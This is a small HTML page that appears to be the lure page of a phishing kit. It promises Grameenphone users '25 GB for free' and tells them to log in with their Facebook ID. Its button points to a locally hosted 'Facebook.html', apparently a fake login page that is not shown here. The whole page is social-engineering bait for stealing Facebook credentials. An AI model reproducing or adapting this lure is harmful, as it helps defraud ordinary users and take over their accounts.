<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Get  25 GB  For Free </title>
<style>
  body, html {
    height: 100%;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: #f0f0f0;
  }

  .container {
    text-align: center;
    background-color: #fff;
    padding: 20px;
    border-radius: 8px;
    box-shadow: 0 2px 4px rgba(0,0,0,0.1);
  }

  .title {
    font-size: 24px;
    color: #333;
    margin-bottom: 20px;
  }

  .continue-button {
    font-size: 16px;
    padding: 10px 30px;
    color: #fff;
    background-color: #007bff;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    text-decoration: none;
  }

  .continue-button:hover {
    background-color: #0056b3;
  }
</style>
</head>
<body>

<div class="container">
  <div class="title">Get 25 GB for free  only Grameenphone</div>
<div class="title"> Press Continue and login your facbook id </div>
<div class="title">Wait 24 hours and Check your id</div>
  <a href="http://127.0.0.1:8080/html/Facebook.html" class="continue-button">Login Facebook </a>
</div>

</body>
</html>
